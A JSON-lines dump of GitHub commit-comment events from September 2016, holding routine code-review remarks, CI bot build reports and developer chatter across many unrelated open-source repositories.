{"id":"4538548854","type":"CommitCommentEvent","actor":{"login":"appsailor"},"repo":{"name":"Alamofire/AlamofireImage"},"payload":{"comment":{"id":18958783,"position":null,"line":null,"path":null,"commit_id":"fe11f6b577c4175ff5849e864669bcac550627c8","created_at":"2016-09-09T07:24:35Z","updated_at":"2016-09-09T07:24:35Z","body":"I do not see the 3.0.0 tag in the repo. Still getting 2.5.0 when I do pod update. Thx in advance."}},"created_at":"2016-09-09T07:24:35Z"}
{"id":"4538549726","type":"CommitCommentEvent","actor":{"login":"Tazaf"},"repo":{"name":"MediaComem/biosentiers"},"payload":{"comment":{"id":18958784,"position":46,"line":78,"path":"www/app/ionicitude.actions.js","commit_id":"97a3d3d1136c6f6fe72aed6a345345fe3f37e18d","created_at":"2016-09-09T07:24:52Z","updated_at":"2016-09-09T07:24:52Z","body":"Cette vérification n'est pas nécessaire : `Ionicitude.addAction()` le fait déjà."}},"created_at":"2016-09-09T07:24:52Z"}
{"id":"4538553745","type":"CommitCommentEvent","actor":{"login":"grdw"},"repo":{"name":"quintel/etmodel"},"payload":{"comment":{"id":18958799,"position":54,"line":249,"path":"app/assets/javascripts/d3/mekko.coffee","commit_id":"931572cdc6b17d74a0a9430eb1222b5802d7738d","created_at":"2016-09-09T07:26:04Z","updated_at":"2016-09-09T07:26:04Z","body":"What does `value()` do in this code? "}},"created_at":"2016-09-09T07:26:04Z"}
{"id":"4538554869","type":"CommitCommentEvent","actor":{"login":"Groundal"},"repo":{"name":"Humbatov/Test"},"payload":{"comment":{"id":18958803,"position":null,"line":null,"path":null,"commit_id":"920fbd76d37c8acc8ee4d16c0ff923fa43e6a77c","created_at":"2016-09-09T07:26:23Z","updated_at":"2016-09-09T07:26:23Z","body":"Conflict"}},"created_at":"2016-09-09T07:26:23Z"}
{"id":"4538560817","type":"CommitCommentEvent","actor":{"login":"darkevilmac"},"repo":{"name":"FabricMC/pomf"},"payload":{"comment":{"id":18958827,"position":5,"line":52,"path":"mappings/net/minecraft/block/tile/impl/TileEntityBeacon.mapping","commit_id":"142673563603631d9775cbdafb01660c89afcf98","created_at":"2016-09-09T07:28:06Z","updated_at":"2016-09-09T07:28:06Z","body":"I think quantity is a bit more descriptive. Quantity is generally referring to the amount of a material, amount by itself is a bit more vague."}},"created_at":"2016-09-09T07:28:06Z"}
{"id":"4538564152","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Wikonator/Expresso"},"payload":{"comment":{"id":18958834,"position":117,"line":252,"path":"index.js","commit_id":"5b9b9eb2e1832349037b04a186301ebdefff8750","created_at":"2016-09-09T07:29:03Z","updated_at":"2016-09-09T07:29:03Z","body":"`deleteCache` doesn't seem to use `req` so you don't have to pass it. You also don't have to pass `res` since it is already accessible since `deleteCache` is defined in the same scope that it is called in.  There is also no reason for it to return a promise since nothing is done with the return value. You are also resolving the promise after you reject it which does not work. I think what you want to do is something like\r\n\r\n```js\r\nfunction deleteCache() {\r\n    return new Promise(function(resolve, reject) {\r\n        cache.del(\"userProfiles\", function(err) {\r\n            if (err) {\r\n                reject(err);\r\n                return;\r\n            }\r\n            resolve();\r\n        });\r\n    });\r\n}\r\n\r\ndeleteCache().then(function() {\r\n    res.render(\"hello\", feedMeArrays);\r\n});\r\n```\r\n"}},"created_at":"2016-09-09T07:29:03Z"}
{"id":"4538571978","type":"CommitCommentEvent","actor":{"login":"cadaver"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18958845,"position":null,"line":null,"path":null,"commit_id":"6895a512af350da0e053cd559bf4cbcaefd99329","created_at":"2016-09-09T07:31:14Z","updated_at":"2016-09-09T07:31:14Z","body":"If we wanted, we could at this point do significant cleanup of the techniques, basically all the SPECMAP, AO etc. definitions could be moved to materials. However since the current ones work, it's not a priority for me, but again, contributions are welcome."}},"created_at":"2016-09-09T07:31:14Z"}
{"id":"4538589898","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18958886,"position":null,"line":null,"path":null,"commit_id":"66928b51c83c82cc40c122fd5ca8ebaabf252717","created_at":"2016-09-09T07:36:20Z","updated_at":"2016-09-09T07:36:20Z","body":"Also see [Issue 261: Archive VC++ 6.0 workspace and project files](https://github.com/weidai11/cryptopp/issues/261)."}},"created_at":"2016-09-09T07:36:20Z"}
{"id":"4538590172","type":"CommitCommentEvent","actor":{"login":"ravingupta"},"repo":{"name":"octoai/config"},"payload":{"comment":{"id":18958888,"position":null,"line":null,"path":null,"commit_id":"0a4904577c661ec9e52b40dd151c31231e8b5276","created_at":"2016-09-09T07:36:25Z","updated_at":"2016-09-09T07:36:25Z","body":"Great, from now onwards we are keeping kong disabled by default \r\nso please keep \r\n`\r\nkong: \r\n    enabled: false \r\n`"}},"created_at":"2016-09-09T07:36:25Z"}
{"id":"4538591243","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18958894,"position":null,"line":null,"path":null,"commit_id":"677c09584cfdea6e1d8fb71c719c9dc056d0ad79","created_at":"2016-09-09T07:36:42Z","updated_at":"2016-09-09T07:36:42Z","body":"Also see [Issue 261: Archive VC++ 6.0 workspace and project files](https://github.com/weidai11/cryptopp/issues/261)."}},"created_at":"2016-09-09T07:36:42Z"}
{"id":"4538597712","type":"CommitCommentEvent","actor":{"login":"pranny"},"repo":{"name":"octoai/config"},"payload":{"comment":{"id":18958896,"position":null,"line":null,"path":null,"commit_id":"0a4904577c661ec9e52b40dd151c31231e8b5276","created_at":"2016-09-09T07:38:34Z","updated_at":"2016-09-09T07:38:34Z","body":"I prefer to use kong. So i will keep using the system that way on my development machine. But if kong is secondary now, I will take care of any changes being commited."}},"created_at":"2016-09-09T07:38:34Z"}
{"id":"4538599620","type":"CommitCommentEvent","actor":{"login":"rbnpi"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":18958905,"position":null,"line":null,"path":null,"commit_id":"1e797ac7fb72ed4eebf468bb2871e05a82cc9c76","created_at":"2016-09-09T07:39:09Z","updated_at":"2016-09-09T07:39:09Z","body":"Could leave it with a test for Qt5 wrapped around it. Other platforms are more likely to be altering input/output sources.\n> \n\n"}},"created_at":"2016-09-09T07:39:09Z"}
{"id":"4538610018","type":"CommitCommentEvent","actor":{"login":"hayco"},"repo":{"name":"HuygensING/langident"},"payload":{"comment":{"id":18958925,"position":4,"line":4,"path":"src/main/java/nl/knaw/huygens/pergamon/nlp/langident/health/ModelHealthCheck.java","commit_id":"cbd5dee88f95f55e28c5b3e4d807826197e0028d","created_at":"2016-09-09T07:42:09Z","updated_at":"2016-09-09T07:42:09Z","body":"Looks like we lucked in when DW 1.0.0. was released: https://github.com/dropwizard/dropwizard/wiki/Upgrade-guide-0.9.x-to-1.0.x#replace-guavas-optional-by-javautiloptional-in-dropwizard-public-api\r\n\r\nHere's a fix: https://github.com/HuygensING/langident/pull/4"}},"created_at":"2016-09-09T07:42:09Z"}
{"id":"4538610305","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18958926,"position":null,"line":null,"path":null,"commit_id":"de88f6a99d8546ace57ef63e9538e656fcf84ab2","created_at":"2016-09-09T07:42:13Z","updated_at":"2016-09-09T07:42:13Z","body":"iteration (Unknown) - Win64-Windows-7-VisualStudio-12: OK (2405 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.24%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T07:42:13Z"}
{"id":"4538619650","type":"CommitCommentEvent","actor":{"login":"sirmarita"},"repo":{"name":"RememberTheAir/GroupButler"},"payload":{"comment":{"id":18958953,"position":null,"line":null,"path":null,"commit_id":"d85e374d47005b3d309e5b132d9042a0776adf50","created_at":"2016-09-09T07:44:48Z","updated_at":"2016-09-09T07:44:48Z","body":"Awesome "}},"created_at":"2016-09-09T07:44:48Z"}
{"id":"4538621947","type":"CommitCommentEvent","actor":{"login":"ulumulu1510"},"repo":{"name":"MassiveCraft/Factions"},"payload":{"comment":{"id":18958958,"position":null,"line":null,"path":null,"commit_id":"717ff2eff987d9c7f2e32f74487e4af5ba01e2de","created_at":"2016-09-09T07:45:28Z","updated_at":"2016-09-09T07:45:28Z","body":"I notice you to switch on the string quite often, which for me is an indicator to rather use an enum in this case.\r\n\r\nI'd advice you having an enum that has ADD, REMOVE and SET as values. It is very easy to  create a new Type (the class \"Type <>\") from an enum, just look at some examples in MassiveCore  . Additionally, Types allow for tab-completion and handle errors (like your default block starting line 84) automatically :).\r\n\r\nYou can then read the Enum and switch on this, which makes the switch statement less error-prone and easier to understand."}},"created_at":"2016-09-09T07:45:28Z"}
{"id":"4538624847","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18958965,"position":null,"line":null,"path":null,"commit_id":"00f84413e1499848b778cce575bed888f124a418","created_at":"2016-09-09T07:46:15Z","updated_at":"2016-09-09T07:46:15Z","body":"os_2.0_develop_signal_slot_bug (schrismartin) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00f84413e1499848b778cce575bed888f124a418-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00f84413e1499848b778cce575bed888f124a418-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T07:46:15Z"}
{"id":"4538625077","type":"CommitCommentEvent","actor":{"login":"ulumulu1510"},"repo":{"name":"MassiveCraft/Factions"},"payload":{"comment":{"id":18958966,"position":51,"line":50,"path":"src/com/massivecraft/factions/cmd/CmdFactionsPowerBoost.java","commit_id":"717ff2eff987d9c7f2e32f74487e4af5ba01e2de","created_at":"2016-09-09T07:46:19Z","updated_at":"2016-09-09T07:46:19Z","body":"Please keep the annotation on its own line :)."}},"created_at":"2016-09-09T07:46:19Z"}
{"id":"4538628463","type":"CommitCommentEvent","actor":{"login":"eafzali"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18958980,"position":14,"line":178,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-09T07:47:13Z","updated_at":"2016-09-09T07:47:13Z","body":"It's possible if we write our own wrapper around Swiper and then ask users to include that. and we do all that stuff there. But I guess this approach is much better and customizable for user. They'll catch the idea and can use whichever library they want and also they can manage their dependencies themselves."}},"created_at":"2016-09-09T07:47:13Z"}
{"id":"4538629136","type":"CommitCommentEvent","actor":{"login":"DuganFairview"},"repo":{"name":"DuganFairview/ArcPython"},"payload":{"comment":{"id":18958984,"position":null,"line":null,"path":null,"commit_id":"013b078797601d8ae127207e2b87de67867cf3ad","created_at":"2016-09-09T07:47:23Z","updated_at":"2016-09-09T07:47:23Z","body":"this is a collection of code from a Python for ArcGIS course."}},"created_at":"2016-09-09T07:47:23Z"}
{"id":"4538629787","type":"CommitCommentEvent","actor":{"login":"SebastianStamm"},"repo":{"name":"camunda/camunda-bpm-webapp"},"payload":{"comment":{"id":18958985,"position":5,"line":14,"path":"ui/admin/tests/specs/users-spec.js","commit_id":"a00848083d98a8a4a7cff56243ee298e3be07f67","created_at":"2016-09-09T07:47:33Z","updated_at":"2016-09-09T07:47:33Z","body":"Is this change intentional?"}},"created_at":"2016-09-09T07:47:33Z"}
{"id":"4538632501","type":"CommitCommentEvent","actor":{"login":"ulumulu1510"},"repo":{"name":"MassiveCraft/Factions"},"payload":{"comment":{"id":18958990,"position":76,"line":69,"path":"src/com/massivecraft/factions/cmd/CmdFactionsPowerBoost.java","commit_id":"717ff2eff987d9c7f2e32f74487e4af5ba01e2de","created_at":"2016-09-09T07:48:16Z","updated_at":"2016-09-09T07:48:16Z","body":"This block, as mentioned below, can be replaced by a Type. "}},"created_at":"2016-09-09T07:48:16Z"}
{"id":"4538632750","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18958992,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-09T07:48:20Z","updated_at":"2016-09-09T07:48:20Z","body":"確認いたしました！\r\n少し難解(発展的)な内容なのでざっくりと理解してくださいませ。\r\nまず今回の異常なエラーを説明するための前提知識として\r\n\r\n- 例外は色々な種類がある(Exception、PDOException etc.)。\r\n- 例外には親子関係がある。\r\n  - 正確には違うのですが、詳細理解はトレーニング後などでクラスを学んだ後になるかと思います(今はざっくりとした説明になります)。\r\n- Exceptionは親でPDOExceptionは子供の関係にある。\r\n- 親は子供の例外を捕捉できるが、子供は親の例外を捕捉できない。\r\n  - 今回ですとExceptionはPDOExceptionを捕捉できるのですが、PDOExceptionはExceptionを捕捉できない。\r\n- try内で捕捉できないエラーが発生すると fatal error になる。\r\n\r\n今回のコードですと\r\n```\r\ntry {\r\n    // データベース接続。文字エンコーディング（utf-8）も実施\r\n    $pdo = new PDO('mysql:host=localhost;dbname=bbs;charset=utf8','root','root',\r\n\r\n    // プリペアドステートメントのエミュレーションを無効にして、\r\n    // MySQL ネイティブの静的プレースホルダを使用する\r\n     array(PDO::ATTR_EMULATE_PREPARES => false));\r\n\r\n    // 例外クラスをthrowする\r\n    throw new Exception('エラーが発生しました'); # 親の例外\r\n\r\n\r\n    // throwされた内容をcatchして処理を実行\r\n     } catch (PDOException $e) { # 子供の例外なので捕捉できずにfatal errorになる。\r\n      exit('データベース接続失敗。'.$e->getMessage());\r\n     }\r\n```\r\n\r\nなので子供の例外の部分`PDOException` を`Exception` に変えればちゃんと(予期した形で)エラーを発生させられます。\r\n"}},"created_at":"2016-09-09T07:48:20Z"}
{"id":"4538635385","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18958996,"position":13,"line":23,"path":"installer/Deploy.ps1","commit_id":"d99a3ceaef5412688e1ec71872c4a32b29f9a23f","created_at":"2016-09-09T07:49:03Z","updated_at":"2016-09-09T07:49:03Z","body":"http?"}},"created_at":"2016-09-09T07:49:03Z"}
{"id":"4538635433","type":"CommitCommentEvent","actor":{"login":"sielakos"},"repo":{"name":"camunda/camunda-bpm-webapp"},"payload":{"comment":{"id":18958997,"position":5,"line":14,"path":"ui/admin/tests/specs/users-spec.js","commit_id":"a00848083d98a8a4a7cff56243ee298e3be07f67","created_at":"2016-09-09T07:49:03Z","updated_at":"2016-09-09T07:49:03Z","body":"No, I always forget about this"}},"created_at":"2016-09-09T07:49:03Z"}
{"id":"4538635696","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18958998,"position":null,"line":null,"path":null,"commit_id":"00f84413e1499848b778cce575bed888f124a418","created_at":"2016-09-09T07:49:09Z","updated_at":"2016-09-09T07:49:09Z","body":"os_2.0_develop_signal_slot_bug (schrismartin) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00f84413e1499848b778cce575bed888f124a418-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00f84413e1499848b778cce575bed888f124a418-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T07:49:09Z"}
{"id":"4538637419","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18959001,"position":null,"line":null,"path":null,"commit_id":"7f958575eaf267c8011e25dfbe6350b818524ff4","created_at":"2016-09-09T07:49:36Z","updated_at":"2016-09-09T07:49:36Z","body":"This was the Keccak dev-branch being merged into Master."}},"created_at":"2016-09-09T07:49:36Z"}
{"id":"4538638437","type":"CommitCommentEvent","actor":{"login":"aiyaruck"},"repo":{"name":"aiyaruck/octopus"},"payload":{"comment":{"id":18959003,"position":null,"line":null,"path":null,"commit_id":"6d46ce924d2625e96f8b784841208132fdac1d36","created_at":"2016-09-09T07:49:54Z","updated_at":"2016-09-09T07:49:54Z","body":"ไรวะ\r\n"}},"created_at":"2016-09-09T07:49:54Z"}
{"id":"4538643528","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18959046,"position":null,"line":null,"path":null,"commit_id":"4856531eeb3fc373f9ea9bbb4bb95c3406182d90","created_at":"2016-09-09T07:51:19Z","updated_at":"2016-09-09T07:51:19Z","body":"radiance_measure_2.0 (rpg777) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4856531eeb3fc373f9ea9bbb4bb95c3406182d90-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4856531eeb3fc373f9ea9bbb4bb95c3406182d90-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T07:51:19Z"}
{"id":"4538647021","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"wahern/cqueues"},"payload":{"comment":{"id":18959150,"position":42,"line":636,"path":"src/thread.c","commit_id":"3d324baa190336ee430bd14c7afd91e304f8bfca","created_at":"2016-09-09T07:52:17Z","updated_at":"2016-09-09T07:52:17Z","body":"Need to set `isinteger` field to `0` in the non-integer case."}},"created_at":"2016-09-09T07:52:17Z"}
{"id":"4538652411","type":"CommitCommentEvent","actor":{"login":"Olfi01"},"repo":{"name":"Pixelmon/Pixelmon-Language"},"payload":{"comment":{"id":18959192,"position":null,"line":null,"path":null,"commit_id":"f46da7dfb74953ee81b956426ad5fc23e766aa1e","created_at":"2016-09-09T07:53:42Z","updated_at":"2016-09-09T07:53:42Z","body":"Alright, I'll do it!"}},"created_at":"2016-09-09T07:53:42Z"}
{"id":"4538655580","type":"CommitCommentEvent","actor":{"login":"ulumulu1510"},"repo":{"name":"MassiveCraft/Factions"},"payload":{"comment":{"id":18959196,"position":105,"line":94,"path":"src/com/massivecraft/factions/cmd/CmdFactionsPowerBoost.java","commit_id":"717ff2eff987d9c7f2e32f74487e4af5ba01e2de","created_at":"2016-09-09T07:54:33Z","updated_at":"2016-09-09T07:54:33Z","body":"I see slight code duplication here:\r\nRather then setting the power for each switch block, rather prepare the amount in the switch and set it once outside of it.\r\n\r\ndouble amount;\r\nswitch  (givetype)\r\n{\r\n ADD:\r\n amount = ....\r\nbreak;\r\nSET:\r\namount = ...\r\nbreak;\r\nREMOVE:\r\namount = ...\r\nbreak;\r\n}\r\n\r\ntargetPlayer.setPowerBoost(amount);"}},"created_at":"2016-09-09T07:54:33Z"}
{"id":"4538657199","type":"CommitCommentEvent","actor":{"login":"ulumulu1510"},"repo":{"name":"MassiveCraft/Factions"},"payload":{"comment":{"id":18959198,"position":129,"line":115,"path":"src/com/massivecraft/factions/cmd/CmdFactionsPowerBoost.java","commit_id":"717ff2eff987d9c7f2e32f74487e4af5ba01e2de","created_at":"2016-09-09T07:54:59Z","updated_at":"2016-09-09T07:54:59Z","body":"Same as above comment :)."}},"created_at":"2016-09-09T07:54:59Z"}
{"id":"4538657313","type":"CommitCommentEvent","actor":{"login":"stonier"},"repo":{"name":"stonier/feed_the_troll"},"payload":{"comment":{"id":18959200,"position":18,"line":17,"path":"parameters/demo_reconfiguration.yaml","commit_id":"61d47f39aa2ab50ae465c2334bde1ac69b97bff1","created_at":"2016-09-09T07:55:01Z","updated_at":"2016-09-09T07:55:01Z","body":"Ach... "}},"created_at":"2016-09-09T07:55:01Z"}
{"id":"4538659757","type":"CommitCommentEvent","actor":{"login":"Gkz2024"},"repo":{"name":"Gkz2024/Nodejs_ServidorBasico"},"payload":{"comment":{"id":18959202,"position":16,"line":16,"path":"5/servidor.js","commit_id":"a047a711a2e028d9591df72169fe004f8ba6d12e","created_at":"2016-09-09T07:55:40Z","updated_at":"2016-09-09T07:55:40Z","body":"Esta linea se comenta."}},"created_at":"2016-09-09T07:55:40Z"}
{"id":"4538664570","type":"CommitCommentEvent","actor":{"login":"pepe2k"},"repo":{"name":"lede-project/source"},"payload":{"comment":{"id":18959214,"position":null,"line":null,"path":null,"commit_id":"083ef3fefecd024b2b9cdc496e1f7811c225041e","created_at":"2016-09-09T07:56:58Z","updated_at":"2016-09-09T07:56:58Z","body":"Hello @dangowrt\r\n\r\nFirmware on this device seems to be RSA signed (looks like the second U-Boot is responsible for verification), so how regular user can flash and start using LEDE on this device?\r\n\r\nUsing official web GUI it's not possible [1], using first U-Boot I wasn't able to, after uploading image to RAM over tftp and erasing 'firmware' area, copy data from RAM to FLASH ('cp' command immediately returns 'done'). Happily there is support for writable environment, but... **environment is configured to be saved in the same sector where second U-Boot resides, so 'saveenv' erases the second U-Boot**! And this breaks the device (not totally, but it won't boot).\r\n\r\nDo you have tested and confirmed method for flashing LEDE on this device?\r\n\r\n> reset button GPIO is still missing (anyone?)\r\n\r\nIIRC, it's connected with GPIO38 (WDT_RST_N), active low.\r\n\r\n[1] https://postimg.org/image/4okfygmlf/\r\n\r\nCheers,\r\nPiotr"}},"created_at":"2016-09-09T07:56:58Z"}
{"id":"4538669930","type":"CommitCommentEvent","actor":{"login":"DuganFairview"},"repo":{"name":"DuganFairview/ArcPython"},"payload":{"comment":{"id":18959219,"position":null,"line":null,"path":null,"commit_id":"013b078797601d8ae127207e2b87de67867cf3ad","created_at":"2016-09-09T07:58:22Z","updated_at":"2016-09-09T07:58:22Z","body":"This is the draft track."}},"created_at":"2016-09-09T07:58:22Z"}
{"id":"4538671307","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"react-component/table"},"payload":{"comment":{"id":18959222,"position":null,"line":null,"path":null,"commit_id":"bf8369b3e14aae7b9bfb80d77fbf55ca28e919d1","created_at":"2016-09-09T07:58:46Z","updated_at":"2016-09-09T07:58:46Z","body":"> this.refs.headTable.querySelectorAll('tr') \r\n\r\n@benjycui 这里为什么用`querySelectorAll`，但其实用的时候只取了第一个值呢`fixedColumnsHeadRowsHeight[0]`？"}},"created_at":"2016-09-09T07:58:46Z"}
{"id":"4538678772","type":"CommitCommentEvent","actor":{"login":"magnars"},"repo":{"name":"kodemaker/kodemaker.no"},"payload":{"comment":{"id":18959231,"position":null,"line":null,"path":null,"commit_id":"c925580bce067b566f1645d3180093c45b40fa21","created_at":"2016-09-09T08:00:42Z","updated_at":"2016-09-09T08:00:42Z","body":"Suh-weet! Et eksempel til etterfølgelse, @rundis @ChristinGorman @eivindw 👍 😄 "}},"created_at":"2016-09-09T08:00:42Z"}
{"id":"4538678958","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"react-component/table"},"payload":{"comment":{"id":18959232,"position":null,"line":null,"path":null,"commit_id":"bf8369b3e14aae7b9bfb80d77fbf55ca28e919d1","created_at":"2016-09-09T08:00:45Z","updated_at":"2016-09-09T08:00:45Z","body":"奥，为了跟 `fixedColumnsBodyRowsHeight` 统一吧。"}},"created_at":"2016-09-09T08:00:45Z"}
{"id":"4538684859","type":"CommitCommentEvent","actor":{"login":"majun215"},"repo":{"name":"majun215/git-learn"},"payload":{"comment":{"id":18959235,"position":1,"line":1,"path":"vimrc","commit_id":"6f182c21f336bc5c2f0319f6f2d91683680d7f7c","created_at":"2016-09-09T08:02:09Z","updated_at":"2016-09-09T08:02:09Z","body":"\"/etc/vimrc"}},"created_at":"2016-09-09T08:02:09Z"}
{"id":"4538685446","type":"CommitCommentEvent","actor":{"login":"eivindw"},"repo":{"name":"kodemaker/kodemaker.no"},"payload":{"comment":{"id":18959237,"position":null,"line":null,"path":null,"commit_id":"c925580bce067b566f1645d3180093c45b40fa21","created_at":"2016-09-09T08:02:17Z","updated_at":"2016-09-09T08:02:17Z","body":"@Odinodin har superkrefter vettu @magnars ;)"}},"created_at":"2016-09-09T08:02:17Z"}
{"id":"4538703294","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18959260,"position":386,"line":1351,"path":"src/ng/directive/ngModel.js","commit_id":"87a2ff76af5d0a9268d8eb84db5755077d27c84c","created_at":"2016-09-09T08:07:01Z","updated_at":"2016-09-09T08:07:01Z","body":"huh?"}},"created_at":"2016-09-09T08:07:01Z"}
{"id":"4538712293","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"react-component/table"},"payload":{"comment":{"id":18959274,"position":53,"line":489,"path":"src/Table.jsx","commit_id":"8f4f4ae233d1e7065b385420058cdc4fee4a559d","created_at":"2016-09-09T08:09:31Z","updated_at":"2016-09-09T08:09:31Z","body":"什么情况下会有 `row.getBoundingClientRect().height == false` 呢？"}},"created_at":"2016-09-09T08:09:31Z"}
{"id":"4538713764","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"react-component/table"},"payload":{"comment":{"id":18959277,"position":null,"line":null,"path":null,"commit_id":"bf8369b3e14aae7b9bfb80d77fbf55ca28e919d1","created_at":"2016-09-09T08:09:55Z","updated_at":"2016-09-09T08:09:55Z","body":"嗯，用 CSS 设置不现实，因为 tr 的高度是无法预知的。"}},"created_at":"2016-09-09T08:09:55Z"}
{"id":"4538714288","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18959278,"position":547,"line":1428,"path":"src/ng/directive/ngModel.js","commit_id":"87a2ff76af5d0a9268d8eb84db5755077d27c84c","created_at":"2016-09-09T08:10:01Z","updated_at":"2016-09-09T08:10:01Z","body":"Hmm perhaps this is a bug - I can't remember why I added the trim now"}},"created_at":"2016-09-09T08:10:01Z"}
{"id":"4538714910","type":"CommitCommentEvent","actor":{"login":"Jeancpaz"},"repo":{"name":"Jeancpaz/Proyecto-Android"},"payload":{"comment":{"id":18959282,"position":null,"line":null,"path":null,"commit_id":"7013781dfb4e70c6ad261eb9d6db173cc8e16f46","created_at":"2016-09-09T08:10:15Z","updated_at":"2016-09-09T08:10:15Z","body":"HI"}},"created_at":"2016-09-09T08:10:15Z"}
{"id":"4538717126","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"react-component/table"},"payload":{"comment":{"id":18959285,"position":null,"line":null,"path":null,"commit_id":"bf8369b3e14aae7b9bfb80d77fbf55ca28e919d1","created_at":"2016-09-09T08:10:49Z","updated_at":"2016-09-09T08:10:49Z","body":"我发现了，之前搞的表头合并用 css 算高度是有问题，应该还是用这个 `syncFixedTableRowHeight ` 来算高度。"}},"created_at":"2016-09-09T08:10:49Z"}
{"id":"4538724269","type":"CommitCommentEvent","actor":{"login":"cy19900702"},"repo":{"name":"toneywu/handALM"},"payload":{"comment":{"id":18959296,"position":null,"line":null,"path":null,"commit_id":"fa8e9b7ab1a95a53223dd7e85568a9fa00ad193a","created_at":"2016-09-09T08:12:45Z","updated_at":"2016-09-09T08:12:45Z","body":"sync"}},"created_at":"2016-09-09T08:12:45Z"}
{"id":"4538724888","type":"CommitCommentEvent","actor":{"login":"zhaoyuan0218"},"repo":{"name":"zhaoyuan0218/hello-world"},"payload":{"comment":{"id":18959297,"position":null,"line":null,"path":null,"commit_id":"f660630a56852282460130c02f5366972d19b6ff","created_at":"2016-09-09T08:12:54Z","updated_at":"2016-09-09T08:12:54Z","body":"xx"}},"created_at":"2016-09-09T08:12:54Z"}
{"id":"4538727030","type":"CommitCommentEvent","actor":{"login":"andela-rekemezie"},"repo":{"name":"bolorundurowb/String-Class"},"payload":{"comment":{"id":18959304,"position":null,"line":null,"path":null,"commit_id":"e38127562a1098671756735c52bbee604e313064","created_at":"2016-09-09T08:13:27Z","updated_at":"2016-09-09T08:13:27Z","body":"Nice work.\r\n\r\n1) Check Code climate to know why your grade is not at `3.5-4.0`\r\n2) Use `const` instead of `let` for values that are not reassigned.\r\n3) Your case case doesn't require your assignment what you want to test in a variable before testing since they're very short.\r\n\r\nE.G:\r\n\r\n`expect('rowland'.ucFirst()).toBe('Rowland')` is easy to follow. Extra definition makes it complex. You would need that if what you're testing is much."}},"created_at":"2016-09-09T08:13:27Z"}
{"id":"4538733920","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18959317,"position":null,"line":null,"path":null,"commit_id":"df48312621351b8102df1a4d344f59487e50b01d","created_at":"2016-09-09T08:15:12Z","updated_at":"2016-09-09T08:15:12Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#HbEu1mK3SfmySyiuIftW_g"}},"created_at":"2016-09-09T08:15:12Z"}
